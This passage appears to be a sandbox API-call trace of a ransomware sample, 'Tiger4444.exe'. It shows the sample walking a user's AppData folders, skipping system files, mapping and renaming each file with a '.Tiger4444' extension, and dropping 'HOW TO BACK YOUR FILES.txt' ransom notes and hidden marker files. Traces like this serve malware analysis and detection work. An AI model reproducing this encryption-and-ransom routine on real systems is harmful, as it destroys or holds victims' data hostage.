(HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0057.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0057.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0057.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0057.174] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14862741538) returned 1 [0057.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0057.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0057.174] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.180] CloseHandle (hObject=0x2cc) returned 1 [0057.180] CloseHandle (hObject=0x2b8) returned 1 [0057.180] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb.Tiger4444") returned 76 [0057.180] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\accesscache.accdb"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\accesscache.accdb.tiger4444"), dwFlags=0x1) returned 1 [0057.181] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3387db8b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3387db8b, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x338a3dd1, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System.mdw", cAlternateFileName="")) returned 1 [0057.181] lstrcmpiW (lpString1="System.mdw", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0057.181] lstrcmpiW (lpString1="System.mdw", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.181] lstrcmpiW (lpString1="System.mdw", lpString2="Tiger4444.exe") returned -1 [0057.181] lstrcmpiW (lpString1="System.mdw", lpString2=".") returned 1 [0057.181] lstrcmpiW (lpString1="System.mdw", lpString2="..") returned 1 [0057.181] lstrcmpiW (lpString1="System.mdw", lpString2="windows") returned -1 [0057.181] lstrcmpiW (lpString1="System.mdw", lpString2="bootmgr") returned 1 [0057.181] lstrcmpiW (lpString1="System.mdw", lpString2="pagefile.sys") returned 1 [0057.181] lstrcmpiW (lpString1="System.mdw", lpString2="boot") returned 1 [0057.181] lstrcmpiW (lpString1="System.mdw", lpString2="ids.txt") returned 1 [0057.181] lstrcmpiW (lpString1="System.mdw", lpString2="NTUSER.DAT") returned 1 [0057.181] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="System.mdw" | out: lpString1="System.mdw") returned="System.mdw" [0057.181] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\System.mdw", dwFileAttributes=0x0) returned 1 [0057.181] lstrlenW (lpString="System.mdw") returned 10 [0057.181] lstrlenW (lpString="Tiger4444") returned 9 [0057.181] lstrcmpiW (lpString1="ystem.mdw", lpString2="Tiger4444") returned 1 [0057.182] lstrlenW (lpString=".dll") returned 4 [0057.182] lstrcmpiW (lpString1=".mdw", lpString2=".dll") returned 1 [0057.182] lstrlenW (lpString=".lnk") returned 4 [0057.182] lstrcmpiW (lpString1=".mdw", lpString2=".lnk") returned 1 [0057.182] lstrlenW (lpString=".ini") returned 4 [0057.182] lstrcmpiW (lpString1=".mdw", lpString2=".ini") returned 1 [0057.182] lstrlenW (lpString=".sys") returned 4 [0057.182] lstrcmpiW (lpString1=".mdw", lpString2=".sys") returned -1 [0057.182] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\System.mdw" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\system.mdw"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0057.182] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0057.182] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14863505854) returned 1 [0057.182] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=126976) returned 1 [0057.182] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0057.182] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0057.182] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1f300, lpName=0x0) returned 0x2cc [0057.283] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1f300) returned 0xbe0000 [0057.414] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0057.414] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0057.414] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0057.414] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0057.414] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0057.414] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0057.414] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0057.414] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0057.414] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14886734914) returned 1 [0057.414] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0057.414] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0057.414] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.416] CloseHandle (hObject=0x2cc) returned 1 [0057.416] CloseHandle (hObject=0x2b8) returned 1 [0057.416] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\System.mdw.Tiger4444") returned 69 [0057.416] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\System.mdw" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\system.mdw"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\System.mdw.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\system.mdw.tiger4444"), dwFlags=0x1) returned 1 [0057.417] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3387db8b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3387db8b, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x338a3dd1, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System.mdw", cAlternateFileName="")) returned 0 [0057.417] FindClose (in: hFindFile=0xc72e88 | out: hFindFile=0xc72e88) returned 1 [0057.417] lstrcpyW (in: lpString1=0x30aeb0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0057.418] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0057.418] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0057.418] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0057.419] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.420] CloseHandle (hObject=0x2b8) returned 1 [0057.420] CloseHandle (hObject=0x2c4) returned 1 [0057.420] GetCurrentThreadId () returned 0xfa8 [0057.420] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664e8 [0057.420] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia" [0057.420] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0057.420] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664e0 | out: hHeap=0xc50000) returned 1 [0057.420] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia" [0057.420] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\" [0057.420] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\.BFC0E91B00AE8A0620D3" [0057.420] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0057.421] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0057.423] FlushFileBuffers (hFile=0x2c4) returned 1 [0057.424] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0057.424] CloseHandle (hObject=0x2c4) returned 1 [0057.425] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia") returned 42 [0057.425] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.425] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x873e0577, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0057.425] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.425] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.425] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0057.425] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.425] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x873e0577, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.425] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.425] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.425] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0057.425] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.425] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.425] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x873e0577, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x873e0577, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x873e0577, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0057.425] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.425] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0057.425] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cf090, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53ed8d1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53ed8d1, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0057.425] lstrcmpiW (lpString1="Flash Player", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.426] lstrcmpiW (lpString1="Flash Player", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.426] lstrcmpiW (lpString1="Flash Player", lpString2="Tiger4444.exe") returned -1 [0057.426] lstrcmpiW (lpString1="Flash Player", lpString2=".") returned 1 [0057.426] lstrcmpiW (lpString1="Flash Player", lpString2="..") returned 1 [0057.426] lstrcmpiW (lpString1="Flash Player", lpString2="windows") returned -1 [0057.426] lstrcmpiW (lpString1="Flash Player", lpString2="bootmgr") returned 1 [0057.426] lstrcmpiW (lpString1="Flash Player", lpString2="pagefile.sys") returned -1 [0057.426] lstrcmpiW (lpString1="Flash Player", lpString2="boot") returned 1 [0057.426] lstrcmpiW (lpString1="Flash Player", lpString2="ids.txt") returned -1 [0057.426] lstrcmpiW (lpString1="Flash Player", lpString2="NTUSER.DAT") returned -1 [0057.426] lstrcpyW (in: lpString1=0x30aeafe, lpString2="Flash Player" | out: lpString1="Flash Player") returned="Flash Player" [0057.426] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66600 [0057.426] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x70) returned 0xc89d10 [0057.426] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66608 | out: ListHead=0xc66828, ListEntry=0xc66608) returned 0xc664c8 [0057.426] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cf090, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53ed8d1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53ed8d1, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 0 [0057.426] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0057.426] lstrcpyW (in: lpString1=0x30aeafe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0057.426] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0057.427] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0057.427] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0057.428] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.428] CloseHandle (hObject=0x2b8) returned 1 [0057.428] CloseHandle (hObject=0x2c4) returned 1 [0057.428] GetCurrentThreadId () returned 0xfa8 [0057.428] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66608 [0057.428] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player" [0057.428] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0057.428] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66600 | out: hHeap=0xc50000) returned 1 [0057.428] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player" [0057.428] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\" [0057.428] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\.BFC0E91B00AE8A0620D3" [0057.428] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0057.432] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0057.434] FlushFileBuffers (hFile=0x2c4) returned 1 [0057.435] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0057.435] CloseHandle (hObject=0x2c4) returned 1 [0057.435] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player") returned 55 [0057.435] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.435] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cf090, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53ed8d1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8740684b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0057.436] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.436] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.436] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0057.436] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.436] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cf090, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53ed8d1, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8740684b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.436] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.436] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.436] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0057.436] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.436] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.436] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53d03fd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53db3d7, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53db3d7, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="#SharedObjects", cAlternateFileName="#SHARE~1")) returned 1 [0057.436] lstrcmpiW (lpString1="#SharedObjects", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.436] lstrcmpiW (lpString1="#SharedObjects", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.436] lstrcmpiW (lpString1="#SharedObjects", lpString2="Tiger4444.exe") returned -1 [0057.436] lstrcmpiW (lpString1="#SharedObjects", lpString2=".") returned -1 [0057.436] lstrcmpiW (lpString1="#SharedObjects", lpString2="..") returned -1 [0057.436] lstrcmpiW (lpString1="#SharedObjects", lpString2="windows") returned -1 [0057.436] lstrcmpiW (lpString1="#SharedObjects", lpString2="bootmgr") returned -1 [0057.436] lstrcmpiW (lpString1="#SharedObjects", lpString2="pagefile.sys") returned -1 [0057.436] lstrcmpiW (lpString1="#SharedObjects", lpString2="boot") returned -1 [0057.436] lstrcmpiW (lpString1="#SharedObjects", lpString2="ids.txt") returned -1 [0057.436] lstrcmpiW (lpString1="#SharedObjects", lpString2="NTUSER.DAT") returned -1 [0057.436] lstrcpyW (in: lpString1=0x30aeb18, lpString2="#SharedObjects" | out: lpString1="#SharedObjects") returned="#SharedObjects" [0057.436] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66300 [0057.436] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8e) returned 0xc864e0 [0057.436] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66308 | out: ListHead=0xc66828, ListEntry=0xc66308) returned 0xc664c8 [0057.436] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8740684b, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8740684b, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8740684b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0057.436] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.436] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0057.436] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53ed8d1, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe53f0003, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe53f0003, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="macromedia.com", cAlternateFileName="MACROM~1.COM")) returned 1 [0057.436] lstrcmpiW (lpString1="macromedia.com", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0057.436] lstrcmpiW (lpString1="macromedia.com", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.437] lstrcmpiW (lpString1="macromedia.com", lpString2="Tiger4444.exe") returned -1 [0057.437] lstrcmpiW (lpString1="macromedia.com", lpString2=".") returned 1 [0057.437] lstrcmpiW (lpString1="macromedia.com", lpString2="..") returned 1 [0057.437] lstrcmpiW (lpString1="macromedia.com", lpString2="windows") returned -1 [0057.437] lstrcmpiW (lpString1="macromedia.com", lpString2="bootmgr") returned 1 [0057.437] lstrcmpiW (lpString1="macromedia.com", lpString2="pagefile.sys") returned -1 [0057.437] lstrcmpiW (lpString1="macromedia.com", lpString2="boot") returned 1 [0057.437] lstrcmpiW 